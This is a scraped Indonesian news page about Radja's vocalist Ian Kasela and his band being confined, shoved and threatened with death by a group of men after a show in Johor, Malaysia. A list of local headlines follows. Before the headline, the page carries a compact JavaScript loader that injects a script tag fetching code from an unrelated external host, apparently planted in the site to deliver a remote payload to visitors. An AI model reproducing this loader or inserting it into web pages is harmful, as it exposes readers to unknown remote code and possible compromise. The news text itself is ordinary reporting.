(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
HEADLINE

Ian Kasela Cs Diancam Dibunuh Usai Manggung di Malaysia, Begini Kronologisnya


KANALKALIMANTAN.COM, BANJARMASIN – Kabar tidak mengenakan dialami oleh personel Band Radja. Mereka mengalami perlakuan tidak baik dan diancam dibunuh oleh sejumlah orang usai tampil di Johor, Malaysia.

Vokalis Band Radja kelahiran Banjarmasin, Ian Kasela membagikan cerita bahwa ia dan personel mendapat perlakuan tidak baik oleh orang-orang yang berbadan besar ketika berada di ruang tunggu.

Kejadian bermula ketika pihaknya dikontrak untuk manggung di Malaysia pada Sabtu (11/3/2023) malam. Sesampainya di sana mereka bernyanyi di jadapan penonton warga Johor sebagaimana penampilan pada umumnya.

Setelah tampil, mereka dibawa ke belakang panggung untuk melakukan meet and great dengan penonton serta jumpa dengan petinggi Johor.

 

Baca juga: Rekam Video Persetubuhan di Kos, Lelaki di Lamandau Dibekuk Polisi

“Lebih kurang 30 menit kami dalam ruangan tersebut, sambil terima beberapa fans yang mau foto bersama dengan Radja,” kata Ian, Senin (13/3/2023) malam.

Tidak lama berselang, Ian menceritakan, sekitar 15 orang berbadan besar dan berpakaian hitam tiba-tiba masuk ke ruang tunggu sambil marah-marah kepada mereka.

Vokalis Band Radja, Ian Kasela saat tampil di Kota Banjarmasin beberapa waktu lalu. Foto: dok.kanalkalimantan

Disampaikan Ian, sejumlah orang berbadan besar itu masuk bersama dua orang dari pihak Tourism Majestic Johor selaku penyelenggara dan langsung mengunci pintu.

“Mereka langsung mengunci pintu (menyekap), lalu spontan menendang meja, kemudian dengan nada tinggi marah-marah sambil menunjuk-nunjuk muka kami,” ujarnya.

“Mereka juga mengeluarkan kata kasar sambil membentak serta mengancam akan membunuh kami jika kembali lagi ke Malaysia,” tambahnya.

Baca juga: Lokasi Judi Dadu dan Sabung Ayam di Banjarmasin Digrebek, 80 Orang Ditangkap Polisi

Penyanyi asli kelahiran Banjarmasin ini juga mengaku mengalami perlakuan fisik. Ia didorong secara keras hingga terpojok ke dinding ruang tunggu.

“Personel Radja lainnya juga dibentak dan disuruh diam serta duduk dilantai. Bahkan dilempar botol minuman yang hampir mengenai wajah drummer Radja,” katanya.

Menurut Ian, terdapat dua orang dari belasan yang masuk ke ruang tunggu yang terus memaki personel Band Radja dengan nada tinggi. Mereka juga tidak memberikan kesempatan untuk personel Radja berbicara atau bertanya masalah yang terjadi.

Berselang 30 menit, masih kata Ian, belasan orang berbadan besar dan dua orang penyelenggara tersebut keluar. Di luar ruangan, para kru Band Radja ikut dimaki dengan kata-kata kasar.

Vokalis Radja ini pun sangat menyayangkan kejadian tersebut bisa terjadi dan menimpa personelnya. Padahal menurutnya, mereka sudah bersedia untuk jumpa fans dan bersikap secara wajar.

Pihaknya juga sudah melaporkan kejadian tersebut kepada Kepolisian Johor, Malaysia. Ia berharap Kepolisian segera menindaklanjutinya laporannya dengan menangkap para pelaku. (Kanalkalimantan.com/rizki)

Reporter : rizki
Editor : bie


Risa

Recent Posts

Dilakban di Paha, Empat Orang di Bandara Juwata Tarakan Selundupkan 4 Kg Sabu

KANALKALIMANTAN.COM, TARAKAN - Empat orang calon penumpang pesawat dengan rute Tarakan-Makassar batal berangkat lantaran kedapatan… Read More

12 jam ago

Satgas TMMD Bikin Sumur Bor untuk Warga Desa Sungai Karias

KANALKALIMANTAN.COM, AMUNTAI - Pengerjaan sumur bor menjadi salah satu sasaran fisik program TNI Manunggal Membangun… Read More

14 jam ago

Jemaah Termuda Kloter 1 Daftar Haji saat Umur 10 Tahun, Setor 2014 Berangkat 2024

KANALKALIMANTAN.COM, BANJARBARU - Berangkat haji ke Baitullah menunaikan Rukun Islam kelima sepenuhnya adalah panggilan. Berusia… Read More

17 jam ago

Embarkasi Banjarmasin Berangkatkan 5.759 JCH Kalsel-Kalteng, Pelayanan Penuh Jemaah Lansia

KANALKALIMANTAN.COM, BANJARBARU - Sebanyak 4.071 jemaah calon haji (JCH) asal Kalimantan Selatan (Kalsel) akan berangkat… Read More

18 jam ago

Caleg Terpilih Tak Harus Mundur Jika Maju Pilkada, Begini Penjelasan Ketua KPU Kalsel

KANALKALIMANTAN.COM, BANJARMASIN - Caleg Anggota Dewan Perwakilan Rakyat (DPR), Anggota Dewan Perwakilan Rakyat Daerah (DPRD)… Read More

19 jam ago

Lepas Keberangkatan 320 Calon Haji, Ini Pesan Bupati Banjar

KANALKALIMANTAN.COM, MARTAPURA - Bagian dalam dan luar halaman Mahligai Sultan Adam di Jalan A Yani… Read More

20 jam ago

This website uses cookies.